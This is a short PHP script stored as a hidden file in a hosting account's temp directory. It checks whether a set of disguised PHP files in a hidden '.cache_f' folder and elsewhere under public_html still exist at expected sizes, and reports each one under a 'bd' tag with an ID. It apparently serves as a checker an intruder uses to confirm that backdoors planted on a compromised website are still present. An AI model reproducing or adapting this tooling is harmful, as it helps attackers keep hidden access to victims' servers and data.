File: /home/burhbrzf/.cagefs/tmp/.flg
<?php $r = '/home/burhbrzf/public_html'; $x = ["/.cache_f/quiz_analysis.php"=>"bd@@423692@@697",
"/.cache_f/class.php"=>"bd@@412972@@6335",
"/.cache_f/include.php"=>"bd@@412974@@6428",
"/function.sitemap.php"=>"bd@@423734@@989",
"/.cache_f/formradio.php"=>"bd@@415150@@704",
"/HTMLDefinition.php"=>"bd@@415226@@624"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');